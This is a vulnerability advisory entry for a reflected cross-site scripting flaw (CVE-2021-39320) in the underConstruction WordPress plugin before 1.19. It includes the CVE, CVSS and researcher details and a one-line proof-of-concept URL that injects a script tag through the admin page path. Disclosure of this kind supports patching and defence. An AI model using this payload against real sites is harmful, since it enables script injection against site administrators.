WordPress Plugin Vulnerabilities

underConstruction < 1.19 - Reflected Cross-Site Scripting

Description

The plugin does not escape the PHP_SELF before outputting it in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php/"><script>alert(/XSS/)</script>/?page=under-construction

Affects Plugins

Plugin icon
underconstruction
Fixed in 1.19

References

CVE
CVE-2021-39320
URL
https://www.wordfence.com/blog/2021/09/reflected-xss-in-underconstruction-plugin/
URL
https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Ram Gall (Wordfence)
Verified
Yes
WPVDB ID
49ae1df0-d6d2-4cbb-9a9d-bf3599429875

Timeline

Publicly Published
2021-08-31 (about 2 years ago)
Added
2021-08-31 (about 2 years ago)
Last Updated
2023-01-28 (about 1 years ago)

Other

Published
Title
Published
2023-02-02
Title
Jobs for WordPress < 2.6.0 - Author+ Stored XSS
Published
2021-04-13
Title
Essential Addons for Elementor < 4.5.4 - Contributor+ Stored Cross-Site Scripting (XSS)
Published
2022-11-25
Title
WP Clictracker <= 1.0.5 - Admin+ Stored XSS
Published
2022-10-21
Title
Quiz And Survey Master < 7.3.11 - Subscriber+ XSS
Published
2024-02-05
Title
Blocksy < 2.0.20 - Authenticated (Editor+) Stored Cross-Site Scripting